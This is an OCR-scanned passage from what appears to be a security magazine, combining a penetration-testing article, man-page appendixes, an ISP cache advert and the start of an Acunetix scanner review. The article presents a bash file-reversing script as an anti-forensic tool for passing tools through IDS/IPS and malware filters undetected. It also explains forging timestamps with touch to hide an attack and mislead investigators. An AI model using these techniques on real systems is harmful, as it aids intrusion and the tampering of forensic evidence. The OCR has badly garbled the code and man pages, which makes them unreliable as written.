tle messy (I have not made any effort to tidy it up), but 
does the trick. 


#! /bin/bash 

This is a small utility script that will reverse the 

file that a user inputs 

It is not coded securely and presumes the directory for a 
number of command - change 

this to run it in a real environment. The main thing is 
a proof of concept anti-forensic tool. 

This script by reversing files will make the file 
undetectable as a type of file by commercial 


file checkers. Run it in reverse to get the original back. 


He HEHEHE HEHE SHE HEHEHE SHE 


Author: Craig S Wright 


#Set the file to reverse 
echo “Enter the name (and path if necessary) of the file 
you want to reverse:”; read FILE 

#i Work out the file size 

SIZE OF FILE="/bin/ls -1 OFILE | awk “{print $5)}7° 


i=0 
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#The script - not pretty - but the idea was all I was 


# aiming at 


K=‘expr $SIZE OF FILE - $i° 
/bin/dd conv=noerror bs=1 skip=$K if=SFILE count=1 > 
SPILE <out 


i= expr $i + 1° 
J. Plus= expr SSIZE OF FILE. 4+ 1” 


while [ “$i7% != “SJ Plus” | 

do 

K=‘expr $SIZE OF FILE - $i° 

/bin/dd conv=noerror bs=1 skip=SK if=SFILE count=1 >> 
SPILE Our 

i= expr $i + 1° 


done 


To go a little further and add some options, | have in- 
cluded the following example. | have NOT added input 
checking or other NECESSARY security controls. This 
is quick and nasty only. Please fix the paths and input 
checking if you want to run it. 

The following script is called reverse.sh: 


#! /bin/bash 

# 

# reverse.sh 

# 

# Set the file to reverse - I DO NOT check if the file 

# actually exists - you should! 

echo “Enter the name (and path if necessary) of the file 


you want to reverse:”; read FILE 


# Default File output = FILE.out 
RIL OUl= JE ITLE.our 


# Set the file where the reversed file is to be saved - I DO 

# NOT check if the file actually exists - you should! 

echo “Enter the name (and path if necessary) of the file 
you want the output saved as (must be different to the 


inpug)s”"; Lead sFILE OUT 


#Set the Block Size. This will default to BS=1 for dd 

BS SIZE=1 

echo “Enter the Block Size (the default = 1 bit):”; read 
BS SIZE 


#i Work out the file size 
SIZE (OF PILE= /bin/ ls’ -l. oPibe-|-awk “{print 95)!" 


i=0 
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#The script - not pretty - but the idea was all I was 


# aiming at 


K=‘expr $SIZE OF FILE - $i° 
/bin/dd conv=noerror bs=$BS SIZE skip=$K if=SFILE count=1 
> $FILE OUT 


i= expr $i + 1° 
J Plus="expr $SIZE OF FILE + 1° 


while [ “$i” != “SJ Plus” ] 

do 

K=‘expr $SIZE OF FILE - $i° 

/bin/dd conv=noerror bs=$BS SIZE skip=$K if=SFILE count=1 
o> SELLE OUT 

i= expr $i + 1° 


done 

# The end... 

To use the previous script enter: 
S ./reverse.sh 


Enter the name of the file you want to reverse and the 
block size (best left at 1 bit). This will return the bitwise 
reversed file. If you want to verify it — run it twice and use 
“diff” to validate that the same file is returned. This will 
reverse the reverse and get the original back. 

This works on text and binary files and, with a little 
tweaking, you can reverse headers but leave the body the 
same, reverse the body after skipping the file header and 
many more options. 

| have yet to find a forensic tool that will find reversed 
text if you are not looking for it. Also, this is a simple way 
of passing tools when an IDS/IPS is in use. The reversed 
files are not found in default scans. This has been tested 
with several of the leading IDS products. In all cases, it 
was possible to send tools without setting an alert. 

With time and practice, you can create a loader script 
that will take the reversed file and execute it directly into 
memory. This leaves no copy of the original file to be un- 
covered with a Host based IDS. 

The script example above has the file output written 
without checking if a file exists. The following is an exam- 
ple of how you can add a small amount of script to verify 
that you are not overwriting an existing file: 


if | =f SFILE J 
then 
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echo “The file [SFILE] that you are seeking write already exists” 


echo “Do you want to overwrite the existing file? ( y/n ) : \c” 
read RESPONSE 

if [ “SRESPONSE” = “n” ] || [ “SRESPONSE” = “N” ] 

then 


echo “The file will not be overwritten and the process will abort!” 
exit 

fi 

fi 


It is also a good idea to use the full path in a script. Us- 
ers can change the path variables they are exposed to 
and, unless you set these (either explicitly or by adding a 
profile for the script to use), an attacker could use a sys- 
tem script to run their own binary. 

The key to successfully testing a system and validating 
the security state of that system is to think outside the box. 
For instance, there are several reasons why you would 
want to reverse a file for testing: 

e ¢ Attackers could do this to bypass filters, controls 
and other protections 

Anti-forensics, finding the needle in a haystack is 
difficult - esp. when the tools do not help 

Pen Testing — just as in point 1 for attackers, the 
tester can use this to load tools without being detect- 
ed by filters or through malware detection engines 


Once a file has bypassed the perimeter controls, get- 
ting it to work inside an organization is simple. Hence, 
a means to bypass controls is of interest to those on the 
attack side of the equation (both validly and less so). 

Next, it is a concern to the forensic professional. Hiding 
files through reversing them makes the process of discov- 
ery a proverbial search for the needle in a haystack. 

An interesting effect to try is to maintain the header on 
a bitmap file (i.e. skip the first portion of the file and re- 
verse the later parts). What ends up occurring is that the 
image can be recreated upside down. All types of interest- 
ing effects can be found. 

As always, the cards are stacked in favor of the attack- 
er. When in a contest that pits rules against open moral- 
ity, rules lose more than not. This does not mean that we 
give up, only that we have to understand the odds that are 
stacked against us and that it is also the case that people 
naturally err. This is when we (the “good” guys) win. 

For security professionals to be successful, we need to 
think outside the box. 


touch 
The *NIX touch command can be used to change the ac- 
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cess and modification times on an existing file or directory 
or to create a new file. There is a common belief that the 
touch command can change any time entry (including the 
change time or, on some systems, the create time); this 
is not correct. The change time and created time of a file 
needs to be modified in other ways (such as extracting 
files from TAR archives). 

lf a file does not exist on the system, the touch com- 
mand will create it. The touch command can be used to 
update or create the access and modification times, set- 
ting these to a specified predefined value. If the option to 
set a new timestamp is not used, the command will set the 
current time. 

The command's options include: 


¢ a: change the access time 

¢ =m: change the modification time 

e r <file>: set the access and modification times of 
the file being changed to be the same as that of one 
named <file> 

¢ t<time>: set the time specified by <time> when up- 
dating the access and modification times 


The touch command uses the format [[cc]yy]JMMD- 
Dhhmm|.ss]. These are defined as follows: 


¢ MM: the two-digit numeric month, 

¢ DD: the two-digit numeric day, 

e hh: the two-digit numeric hour, 

¢ mm: the two-digit numeric minutes, 

¢ ss: Sets the two-digit seconds, 

¢ cc: the first two digits of the year, and 
¢ yy: the last two digits of the year. 


The touch command can be used without options to set 
the current time. This is done to simulate an update to a 
file without actually accessing it. For an attacker, this can 
be used to hide an attack. Setting a false path can lead 
an investigator into checking the wrong files and wasting 
valuable time. 

For instance, running “touch /bin/sh” could be used to 
lead an investigator into checking the use of the “/bin/sh” 
command shell when another shell was really used. The 
contents of the “/bin/sh” file are not changed, the time- 
stamps are updated to reflect the system’s current date 
and time. Alternatively, an attacker could also change the 
timestamps of files to have these seem to have been ac- 
cessed at any other time (including a time in the future). 

lf you know that an administrator logs into a system 
at 9.30 am each day, you could set the files touched in 
the login process back to the prior date (for instance, to 
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09.30am on Monday 9th March 2009). 
touch -a -t ‘2009-03-09 9:32:21’ /bin/csh 


This command will change the access time of the “/bin/ 
csh” command shell to March O9th, 2009 at 9:32:21am. 

One unfortunate aspect of the touch command is that 
it is not recursive. You have to touch each file or create 
a script to do this. Fortunately, this is simple. For example, 
linking the find command to touch using exec will allow 
you to selectively update a number of files and even re- 
curse through directories: 


e find . -exec touch {} \; 
e find .| xargs touch 
¢ — find . -printO | xargs -O touch 


Where long file names and spaces are used, the last find 
option above will handle this. 

The real secret is to use the touch command in scripts. 
As you run an attack to validate a system, update the ac- 
cess time to that which it previously was set to. 


Programming tools 

It is simple when compilera or other tools are installed on 
a system. In this event, a tester can simply add any tools 
that are desired by compiling them on the host. Source 
code can be uploaded over ASCII connections, such as 
telnet, so even a console can be used to load your favorite 
tools when compilers are installed. 

In many cases, compilers and other similar tools have 
been restricted or (ideally) not installed on production sys- 
tems. Where this is the case, it is still common to discover 
many related tools (including disassemblers) on a host. 
Some of these tools are covered in this section. 

In many instances, systems will not have tools at your 
disposal that can easily be used to test privilege escala- 
tion. In this instance, it may be necessary to “roll your own” 
exploit. Stack and Heap overflows are all too common in 
software. Even where patches are available, it is all too 
common to find patches missing. This can be a result of 
legacy systems not functioning when the patch is applied, 
or a simple failure for any reason to have applied the patch. 

In these instances, an attacker could exploit a flaw in 
the software to gain additional privileges on the system 
(maybe even root). 


GDB / DBX 

The “gdb” is a software debugger in Linux and “dbx” is 
essentially the same in UNIX. These commands are com- 
monly found on systems where compilers have been re- 
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moved as many system administrators are uncertain of 
their use. 

There are many useful tutorials on the web for both gdb 
and dbx. Some of these include: 


¢ http://www.ece.unm.edu/faculty/jimp/310/nasm/gdb.pdf 
¢ http://dirac.org/linux/gdb/ 


These are highly advanced tools, so | have left them to the 
end of this paper. The boon of finding them on a system 
cannot be beaten. These tools are primarily used when 
looking for exploitable flaws on a system. If you can copy 
an executable from the system, this can be run and verified 
on another *NIX system. Any exploitable flaws can then be 
discovered and used in the testing and validation process. 


objdump 
The “objdump” command is a disassembler similar to gdb. 
It is not a debugger. This difference means that you can 
disassemble the executable binary without actually hav- 
ing to execute it. This can come in handy when you are 
looking for poorly constructed binaries (e.g. those with 
stack overflows) but are not ready to execute these. 

This also gets around the issue where a binary has read 
privileges for a user account used by the tester but not 
execute rights. 


readelf 

The “readelf’ command is similar to “objdump” with more 
detailed information being provided on ELF headers (Ex- 
ecutable and Linking Format). It is used in the analysis 
of executable binary files to view the GOT (Global Offset 
Table) and the PLT (Procedural Linkage Table). 


Itrace / strace 

The “ltrace” tool is used to intercept and record library 
calls. It is similar to “strace”. The ‘“Itrace” command ex- 
ecutes a program recording all of the library calls made 
and any signals that are received. “strace” also records 
system calls as well as library calls. 


Appendixes 
The following pages are a list of Appendixes and provide 
“MAN’ entries and external sources to the paper. 


Appendix 1 - *NIX Commands 

The following are a list of the “MAN” or manual pages for a 
couple of the commands listed in this paper. These will vary 
with respect to the system they are run on and it is essential 
to always familiarize yourself with the particularities of the 
system that you are working on. These pages are taken from 
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the author’s system. These are direct entries from the *NIX 
“man” entries and have only been slightly modified for style 
and format. Not all commands used in this paper have been 
included. A small sample has been copied in order to help 
you become familiar with the output of the MAN command. 
“date” 

The “date” command displays the current time in the given 
FORMAT, or can be used to set the system date. 


¢ date [OPTION]... [+FORMAT] 
¢ date [-u|--utc]--universal] [MMDDhhmm[[CC]YY][.ss]] 


The command options are: 

-d, --date=STRING 

display time described by STRING, not ‘now’ 
-f, --file=DATEFILE 

like --date once for each line of DATEFILE 
-r, --reference=FILE 

display the last modification time of FILE 

-R, --rfc-2822 

output date and time in RFC 2822 format 
==Pre-3539=TIMEOPEG 


output date and time in RFC 3339 format. TIMESPEC 
='date’, ‘seconds’, or ‘ns’ for date and time to the indicat- 
ed precision. 

-s, —-set=STRING 

set time described by STRING 

=“, ==utC, =u versal 

print or set Coordinated Universal Time. 

--help display this help and exit 


--version 


output version information and exit. 
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FORMAT controls the output. The only valid option for 
the second form specifies Coordinated Universal Time. 
Interpreted sequences are: 

66 a literal % 

6a locale’s abbreviated weekday name (e.g., Sun) 
SA locale’s full weekday name (e.g., Sunday) 

Sb locale’s abbreviated month name (e.g., Jan) 


6B locale’s full month name (e.g., January) 


6c locale’s date and time (e.g., Thu Mar 3 23:05:25 2005) 

6C century; like SY, except omit last two digits 
(e.0e5 21) 

6d day of month (e.g, 01) 

SD date; same as %m/%d/%y 

ce day of month, space padded; same as % d 

SF full date; same as %Y-%m-%d 

Sg the last two digits of the year corresponding to the %V 
week number 

6G the year corresponding to the %V week number 

Sh same as %b 

ou our (00..23) 

$I hour (01..12) 

6] day of year (001..366) 

oe Hour ( Ung23) 

oL. Mou 4 toe 2) 

am month (01... 12) 

6M minute (00..59) 

Sn a newline 


SN nanoseconds (000000000. .999999999) 


Sp locale’s equivalent of either AM or PM; blank if 
not known 

6P like %p, but lower case 

6r locale’s 12-hour clock time (e.g., 11:11:04 PM) 

SR 24-hour hour and minute; same as %H:%M 

6s seconds since 1970-01-01 00:00:00 UTC 

6S second (00..60) 

St a tab 

6T time; same as %H:%3M:%S 

su day of week (1..7); 1 is Monday 

SU week number of year with Sunday as first day of week 
(00. 253) 

SV week number of year with Monday as first day of week 
(Ol<co3) 

Sw day of week (0..6); 0 is Sunday 

SW week number of year with Monday as first day of week 
(00 453) 

$x locale’s date representation (e.g., 12/31/99) 

6X locale’s time representation (e.g., 23:13:48) 

Sy last two digits of year (00..99) 

SY year 


6z thhmm numeric timezone (e.g., -0400) 
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6:zthh:mm numeric timezone (e.g., -04:00) 


6::zZ +thh:mm:ss numeric time zone (e.g., -04:00:00) S:::z 
numeric time zone with : 
=04, +05230) 
(e.g., EDT) 


to necessary precision (e.g., 


6Z alphabetic time zone abbreviation 


By default, the “date” command pads numeric fields with 
zeroes. The following optional flags may follow ‘%:: 

- (hyphen) do not pad the field _ (underscore) pad 
with spaces O (zero) pad with zeros “ use upper case if 
possible # use opposite case if possible. After any flags 
comes an optional field width, as a decimal number; 
then an optional modifier, which is either E to use the 
locale’s alternate representations if available, or O to 
use the locale’s alternate numeric symbols if available. 


“dd” 

dd [bs=s] [cbs=s] [conv=conversion] [count=n] [1ibs=s] 
[if=file] [imsg=string] [1seek=n] [obs=s] [of=file] 
[omsg=string] [seek=n] [skip=n] 


DESCRIPTION 

dd reads and writes data by blocks, and can convert the 
data between formats. dd is often used for devices such 
as tapes which have discrete block sizes, or for fast multi- 
sector reads from disks. The conversions can accommo- 
date systems that need de-blocking, conversion to/from 
EBCDIC and fixed length records. 

dd processes input data as follows: 


1. dd reads an input block. 

2. If you specified conv=syne and this input block is 
smaller than the specified input block size, dd pads 
it to the specified size with null bytes. By also spec- 
ifying a block or unblock conversion, dd implements 
spaces instead of null bytes. 

3. If bs=size IS specified and requested no conversion 
other than sync or noerror, dd writes the input block 
(padded where necessary) to the output as a single 
block and omits the remaining steps. 

4. By specifying the swab conversion, dad swaps each 
pair of input bytes. If there is an odd number of input 
bytes, dd does not attempt to swap the last byte. 

5. dd performs all remaining conversions on the input da- 
ta independently of the input block boundaries. A fixed- 
length input or output record may span these boundaries. 

6. dd collects the converted data into output blocks of 
the specified size. When dd reaches the end of the 
input, it writes the remaining output as a block (with 
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added padding if the conv=sync option is used). Con- 
sequently, the final output block can be smaller than 
the output block size. 


Parameters 


bs=size 

This option sets both input and output block sizes to size 
bytes. You can suffix this decimal number with w, b, k, or 
xnumber to multiply it by 2, 512, 1024, or number, respec- 
tively. You can also specify size as two decimal numbers 
(with or without suffixes) separated by x to indicate the 
product of the two values. Processing is faster when ibs 
and obs are equal, since this avoids buffer copying. The 
default block size is 1b. bs=size Supersedes any settings 
of ibs=size OF obs=size. Specifying bs=size with no other 
conversions than noerror, notrunc, or sync, dd writes the 
data from each input block as a separate output block. In 
the event that the input data is less than a full block and 
you did not request sync conversion, the output block is 
the same size as the input block. 


cbs=size 

Sets the size of the conversion buffer used by various 
conv options. It is possible to specify this option in the 
same way as for bs. 


conv=conversion[, conversion, ...] 
This option specifies conversion method. Conversion can 
be any of the following: 


ascii 

Converts EBCDIC input to ASCII for output. dd copies 
cbs bytes at a time to the conversion buffer, maps them 
to ASCII, then strips trailing blanks, adds a newline, and 
copies this line to the output buffer. 


block 

Converts variable-length records to fixed-length records. 
dd treats the input data as a sequence of variable-length 
records (each terminated by a newline or an EOF char- 
acter) independent of the block boundaries. dd converts 
each input record by first removing any newline charac- 
ters, then padding (with spaces) or truncating the record 
to the size of the conversion buffer. dd reports the number 
of truncated records on the standard error. It is necessary 
to specify cbs=size with this conversion setting. 


ebcdic 
Converts ASCII input to EBCDIC for output. dd copies a 
line of ASCII to the conversion buffer, discards the newline, 
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pads it with trailing blanks to cbs bytes, maps it to EBCDIC 
and copies it to the output buffer. 


ibm 
Converts ASCII to a variant of EBCDIC which gives better 
output on many IBM printers. 


Icase 
Converts uppercase input to lowercase. 


noerror 
Ignore errors on input. 


notrunc 

The option sets dd so that it does not truncate the out- 
put file. If a block is explicitly written, it replaces the exist- 
ing block; all other blocks are unchanged. See also of=file 
and seek=n. 


swab 

Swaps the order of every pair of input bytes. If the current 
input record has an odd number of bytes, this conversion 
does not attempt to swap the last byte of the record. 


sync 

Pads any input block shorter than ibs to that size with null 
bytes before conversion and output. If you also specified 
block or unblock, dd uses spaces instead of null bytes 
for padding. 


ucase 
Converts lowercase input to uppercase. 


unblock 

Converts fixed-length records to variable-length records 
by reading a number of bytes equal to the size of the con- 
version buffer (or the number of bytes remaining in the 
input, if less than the conversion buffer size), deleting all 
trailing soaces, and appending a newline character. You 
must specify cbs=size with this conversion. 


convfile 

Deploys convfile as a translation table if it is not one of 
the conversion formats listed here and it is the name of a 
file of exactly 256 bytes. It is possible to perform multiple 
conversions at the same time by separating arguments to 
conv with commas; however, some conversions are mutu- 
ally exclusive (for example, ucase and Icase). 


count=n 
Copies only n input blocks to the output. 


BSD 


MAGAZINE 


76 


ibs=size 
Sets the input block size to size bytes. Specify this option 
in the same way as bs. 


if=file 
Reads input data from file. If you don’t specify this option, 
dd reads data from the standard input. 


imsg=string 

Displays string when all data has been read from the cur- 
rent volume, replacing all occurrences of %d in string with 
the number of the next volume to be read. dd then reads 
and discards a line from the controlling terminal, giving 
you a chance to change volumes (usually a floppy disk). 


iseek=n 

Seeks to the nth block of the input file. The distinction be- 
tween this and skip is that iseek does not read the dis- 
carded data; however there are some devices, such as 
tape drives and communication lines, on which seeking is 
not possible, so only skip is appropriate. 


obs=size 

Sets the output block size to size bytes. Specify this option 
in the same way as bs. The size of the destination should 
be a multiple of the value chosen for size. For example, 
if you choose obs=10k, the destination’s size should be a 
multiple of 10k. 


of=file 

Writes output data to file. Without setting this option, 
dd writes data to the standard output. dd truncates the 
output file before writing to it, unless you specified the 
seek=n operand. If you specify seek=n, but do not specify 
conv=notrunc, dd preserves only those blocks in the out- 
put file over which it seeks. If the size of the seek plus the 
size of the input file is less than the size of the output file, 
this can result in a shortened output file. 


omsg=string 

Displays string when dd runs out of room while writing to the 
current volume. Any occurrences of a in string are replaced 
with the number of the next volume to be written. dd then 
reads and discards a line from the controlling terminal, giv- 
ing you a chance to change volumes (usually a floppy disk). 


seek=n 
Initially seeks to the nth block of the output file. 


skip=n 
Reads and discards the first n blocks of input. 
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“which” 
syntax 


which [options] [--] program name [...] 
Options 

--all, -a 

Print all matching executables in PATH, not just the first. 
--read-alias, -i 


Read aliases from stdin, reporting matching ones on std- 
out. This is useful in combination with using an alias for 


779) 


which itself. (e.g. “alias which=’alias | which -i’’). 
=—Skip-alias 

Ignore option --read-alias, if any. This is useful to explic- 
itly search for normal binaries, while using the “--read- 
alias” option in an alias for which. 

==Sk Epcot 

Skip directories in PATH that start with a dot. 


--skip-tilde 


Skip directories in PATH that start with a tilde and exe- 
cutables which reside in the HOME directory. 


==—Show=c0 

lf a directory in PATH starts with a dot and a match- 
ing executable was found for that path, then print “./pro- 
gram_name’ rather than the full path. 


--show-tilde 


Output a tilde when a directory matches the HOME direc- 
tory.This option is ignored when which is invoked as root. 


--tty-only 

Stop processing options on the right if not on tty. 
--version, -v, -V 

Print version information on standard output then exit 


successfully. 
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--help 


Print usage information on standard output then exit suc- 
cessfully. 


RETURN VALUE 
Which returns the number of failed arguments, or -1 when 
no program name was supplied. 


EXAMPLE 
A useful way to use this command is by adding an alias for 
which like the following: 


alias which=’which --tty-only --show-tilde --show-dot’ 


This will print the readable ~/ and ./ when starting which 
from your prompt, while still printing the full path when 
used from a script: 


> which sh 
~/usr/bin/ssh 
> echo “which ssh° 


/home/hacker/bin/ssh 


Aliases are also supported. An example alias for which 
that is using this feature is as follows: 


alias which=’alias | which --tty-only --read-alias --show- 


tilde --show-dot’ 


This will print the output of alias for each alias that 
matches one of the given arguments. For example, using 
this alias on itself in a tcsh: 


S alias which alias \| /usr/bin/which -i !\* 


S which which 


which (alias | ./which -i !*) 


/usr/bin/which 

“uname” 

The “uname” command will output system information about 
the host and operating system it is run from. When no op- 
tions are supplied, ‘uname’ acts as if the ‘-s’ flag was given. 
syntax 

uname [options]... 


Options 


-~a, --all 
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Display all of the information from the flags list- 
ed below. 


-m, --machine 
Display the host (hardware) type. 

-n, --nodename 

Display the host’s network node hostname. 
-p, --processor 

Display the host’s processor type. 

-r, --release 

Display the operating system release. 

-s, --sysname 


Display the operating system name. 


Print the operating system version. 
If multiple options or ‘-a’ are supplied, the selected infor- 
mation is printed in this order: 


Sysname Nodename 
Release Osversion Machine 
The OSVERSION may consist of multiple words. For instance: 


Suname -a 
=> Linux linux-0915 2.6.25.16-0.1l-pae #1 SMP 2008-08-21 
00:34:25 +0200 i686 i686 i386 GNU/Linux 


Command Summary 
The following are a list of “NIX commands and a quick 
summary of their use. 


A 


alias: Create an alias 


apropos: Search Help manual pages (man -k) 


at: Execute scheduled command at a time 


awk: Find and Replace text 
B 


bash: GNU Bourne-Again Shell 
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bg: Send to background 


break: Exit from a loop 


C 


case: Conditionally perform a command 

cat: Display the contents of a file 

cd: Change the Directory 

cfdisk: Partition table manipulator for Linux 
chgrp: Change group ownership 

chmod: Change access permissions 


chown: Change file owner and group 


chroot: Run a command with a different root directory 
chkconfig: System services (runlevel) 

cksumPrint: CRC checksum and byte counts 

clear: Clear the terminal screen 

cmp: Compare two files 

comm: Compare two sorted files line by line 
command: Run a command - ignoring shell functions 


continue: Resume the next iteration of a loop 


cp: Copy one or more files to another location 


cron: Daemon to execute scheduled commands 
crontab: Schedule a command to run at a later time 
csplit: Split a file into context-determined sections 


cut: Divide a file into several parts 


D 


date: Display or change the date & time 

dd: Convert and copy a file, write disk headers, boot records 
declare: Declare variables and give them attributes 

df: Display free disk space 

diff: Display the differences between two files 

dig? DNS Lookup 


dmesg: Print kernel & driver messages 


du: Estimate file space usage 


echo: Display message on screen 

egrep: Search file(s) for lines that match an extended 
(regex) expression 

eject: Eject removable media 

emacs: A test editor 

enable: Enable and disable built-in shell commands 

env: Set or view environment variables 

ethtool: Ethernet card settings 

eval: Evaluate several commands/arguments 

exec: Execute a command 

exit: Exit a shell 

expect: Automate arbitrary applications accessed over 


a terminal 
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expand: Convert tabs to spaces 
export: Set an environment variable 


expr: Evaluate expressions 


fg: Send job to foreground 

fgrep: Search file(s) for lines that match a fixed string 

file: Determine the file’s type (1i.e., pdf, text, etc.) 

find: Search for files that meet a desired criteria 

for: Expand words, and execute commands - used for looping 
in shells 

format: Format disks or tapes 

free: Display memory usage 


ftp: File Transfer Protocol 


G 


gawk: Find and Replace text within a file/files 
grep: Search file(s) for lines that match a given pattern 
groups: Print group names a user is in 


gzip: Compress or decompress named file/files 


H 


head: Output the first part of file(s) 
history: Print the command history 


hostname: Print or set the host’s system name 


id: Print user and group ids 

if: Conditionally perform a command 
ifconfig: Configure a network interface 
ifdown: Stop a network interface 


ifup: Start a network interface up 


import: Capture an X server screen and save the image 


to file 


K 


kills Stop or end @ running process 


killall: Kill processes by name 


L 


less: Display output one screen at a time 
let: Perform arithmetic on shell variables 
in: Make links between files 


local: Create variables 


locate: Find files 
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logname: Print the user’s current login name 
logout: Exit a login shell 

lore Print. 42 file 

lprm: Remove jobs from the print queue 


les list anfermearicon abour tile/iles 


lsof: List open files 
M 


make: Re/Compile a program 

man: The *NIX help manual 

mkdir: Create new folder/folders 

mkfifo: Make FIFOs (named pipes) 

mknod: Make block or character special files 
more: Display output one screen at a time 
mount: Mount a file system 


mv: Move or rename files or directories 


netstat: Display network information 
nice: Set the priority of a command or job 


nslookup: Query DNS servers interactively 
O 
open: Open a file in its default application 


p 


passwd: Modify a user’s password 

ping: Test a network connection 

popd: Restore the previous value of the current directory 
ps: Process sialus 


pushd: Save and then change the current directory 


Q 


quota: Display disk usage and limits 
quotacheck: Scan a file system for disk usage 


quotactl: Set disk quotas 
R 


ram: Create and manage a RAM based disk device 
rcp: Copy files between two machines 

read: Read a line from standard input 

reboot: Reboot the system 

renice: Alter priority of running processes 
remsync: Synchronize remote files via email 


return: Exit a shell function 
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rev: Reverse lines of a file 
rm: Remove files 
rmdir: Remove folder/folders 


rsync: Remote file copy (Synchronize file trees) 


) 


screen: Multiplex terminal, run remote shells via ssh 


scp: Secure copy (remote file copy) 
sdiff: Merge two files interactively 
sed: The stream Editor 

select: Accept keyboard input 

seq: Print numeric sequences 

set: Manipulate shell variables and functions 
sftp: Secure File Transfer Program 
shift: Shift positional parameters 
shopt: Shell Options 

shutdown: Shutdown or restart linux 
sleep: Delay for a specified time 
slocate: Find files 

sort: Sort text files 

source: Run commands from a file °.’ 


split: Split a file into fixed-size sections 


ssh: Secure Shell client (an encrypted remote login program) 


strace: Trace system calls and signals 
su: Substitute user identity 
sudo: Execute a command as another user 


sum: Print a checksum for a file 


T 


tail: Output the last part of files 

tar: Tape Archiver 

tee: Redirect output to multiple files 

time: Measure a program’s running time 

touch: Change file timestamps 

top: List the processes running on the system 
traceroute: Trace the Route to a Host over a network 
trap: Run a command when a signal is set (bourne) 
tty: Print filename of terminal on stdin 


type: Describe a command 


U 


ulimit: Limit user resources 

umask: Change a user’s file creation mask 
umount: Unmount a device 

unalias: Remove an alias 

uname: Print system information 


unexpand: Convert spaces to tabs 


unset: Remove variable or function names 
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unshar: Unpack shell archive scripts 
until: Execute commands (until error) 
useradd: Create a new user account 


usermod: Modify a user account 


uuencode: Encode a binary file 


uudecode: Decode a file created by uuencode 


V 


vi: Text Editor 


vmstat: Report virtual memory statistics 


W 


users: List the currently logged in users on a system 


watch: Execute or display a program periodically (that is 


every so often) 
wc: Print byte, word, and line counts 
whereis: Report all known instances of a command 
which: Locate a program file in the user’s path. 


while: Execute commands when a statement is true 


who: Print all of the usernames currently logged into 


a host 


whoami: Print the current user id and name (°id -un’) 


wget: Retrieve web pages or files via HTTP, HTTPS or FTP 


write: Send a message to another user on a host 
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raster. 
Better. 
Reliable. 
Trusted by over 500 ISPs worldwide. 


Hyper is the first multimedia cache fully developed in Brazil, by Taghos. 
With Hyper, ISPs can save on network bandwidth while increasing 
content-delivery speeds, resulting in end-customer satisfaction. 


Features: 

- 24x7X365 always-on support 

- Active monitoring 

- Automatic updates 

- Appliance or license 

- Easy deployment 

- Configuration and reports via 
web interface 


Cache 
Up to 15 Mbps 1x 11B 
Up to 50 Mbps 2x 1 1B - 
Up to 100 Mbps 8 G 2x 11B 1x 160 GB 
Up to 150Mbps | 3x 2 TB 1x 160 GB 
Up to 300 Mbps 5x 2 TB 1x 240 GB 
Up to 500 Mbps 32 7X 2 1B 1X 480 GB 
: : Up to 1 Gbps 4G 10x 1 TB 1x 480 GB 
Remote Instal| Up to 2 Gbps 24x11B 3x 480 GB 


13000 Up to 3 Gbps 128 GB 32x 1 1B 5x 480 GB 


Using your hardware 


Visit us at WWW.taghos.com and start saving bandwidth today! 


Acunetix Web 


Vulnerability Scanner 


Find out if your website is secure before hackers download 
sensitive data, commit a crime by using your website as a 
launch pad, and endanger your business. Acunetix Web 
Vulnerability Scanner (WVS) crawls your website, automatically 
analyzes your web applications and finds perilous SQL 
injections, Cross site scripting and other vulnerabilities that 
expose your online business. Concise reports identify where 
web applications need to be fixed, thus enabling you to 
protect your business from impending hacker attacks! 


professionals can no longer focus on the patching and 
infrastructure vulnerabilities. If regulations or industry 
standards are not your driver, you can guarantee that cli- 
ents will soon be asking “how are you securing your appli- 
cations?” As with any solution you need to have the peo- 
ple, processes, and technology in place to be successful. 
While much of this testing could be done manually, the 
proliferation of applications used in organizations today 
would make manual testing an insurmountable and nev- 
er-ending task. Application Security testing tools are often 
the best solution for security professionals tasked with se- 
curing applications throughout the Software Development 
Lifecycle (SDLC). This is where we introduce Acunetix! 
As a precursor to the remainder of this article, | have 
had the opportunity to work with a number of Application 
Security tools for large enterprises. This is the first time | 
have worked directly with Acunetix. 


n today’s threat landscape, organizations and security 


What is Acunetix Web Vulnerability Scanner 
In Acunetix's own words: 


CRmunoie Alek. Walnarnhility CAARASe lec FA APA ton wok 
Acunetix Web Vulnerability Scanner is an automated web 


application security testing tool that audits your web applica- 
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ime bipehnoerlinn TAriiilnernbiice Live Chl lnisaesan: race cits 
tions by checking for vulnerabilities like SQL Injection, Cross site 


scripting, and other exploitable vulnerabilities. 


The need to be able to test applications in depth and 
further than traditional vulnerability management tools 
(e.g. Nessus, Nexpose, etc.) do, has created a market 
with several players in the Application Security space. 
Whereas Nessus / Nexpose are vulnerability manage- 
ment (VM) tools, Acunetix focuses more on web appli- 
cation vulnerabilities and variants thereof, and does 
a much better job at detection than traditional VM tools. 


Key Features and Functionality 

| could spend time walking you through how to complete 
a scan with Acunetix, but the “getting started” and “user 
manual” provide a wealth of information for this. The best 
use of your time will be to understand the features that 
distinguish Acunetix from the other vulnerability scanners. 


¢ Vulnerability Detection — First and foremost, does 
the Acunetix do what is says it does? The resound- 
ing answer is...YES! The ability to scan HTML5/JS 
sites provides coverage where a number of prod- 
ucts start to fall apart. Additionally, the speed of the 
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scanner allows scans to be completed in very little 
time. When | did a side by side comparison | found 
a number of features with Acunetix | did not see with 
OSS (Open Source Software) products; 

¢ AcuSensor — AcuSensor is an agent installation that 
is installed on the web server for testing purposes, in- 
teracting with the console. This allows the number of 
false positives to be reduced as the scanner is not on- 
ly relying on HTTP responses but will also interact with 
the agent on the server to determine if the test was 
successful or not. At the time of this writing, AcuSen- 
sor is used primarily with PHP and .NET web applica- 
tions. | understand that other products have this simi- 
lar technology for JAVA so before investing make sure 
you understand how your applications were written so 
you can fully take advantage of this. To emphasise, 
AcuSensor identifies more vulnerabilities than a tra- 
ditional black box web security scanner and reduc- 
es false positives. AcuSensor will show you the line 
of code where it found the vulnerability, which helps 
you to get it fixed faster. This is achieved by combin- 
ing black box scanning techniques with dynamic code 
analysis whilst the source code is being executed. 

¢ Itis also possible to detect some vulnerabilities using 
an intermediary server. AcuMonitor allows Acunetix 
WVS to find such vulnerabilities, including Blind XSS, 
Server Side Request Forgery and Email Header In- 
jection. It depends on the vulnerability but it can be 
reported during the scan and also by an email which 
will be sent directly to the user. 

¢ Tools — These are a few of the features that jumped 
out at me right away. Some of the tools are not some- 
thing you'd expect to see in a Web Application Secu- 
rity scanner, but such tools aid interpretation of the 
scan results. 


Subdomain Scanner 
(@) Blind SQL Injector 


{== HTTP Editor 


HTTP Sniffer 
oe HTTP Fuzzer 
= ® Authentication Tester 


get Compare Results 


Figure 1. 
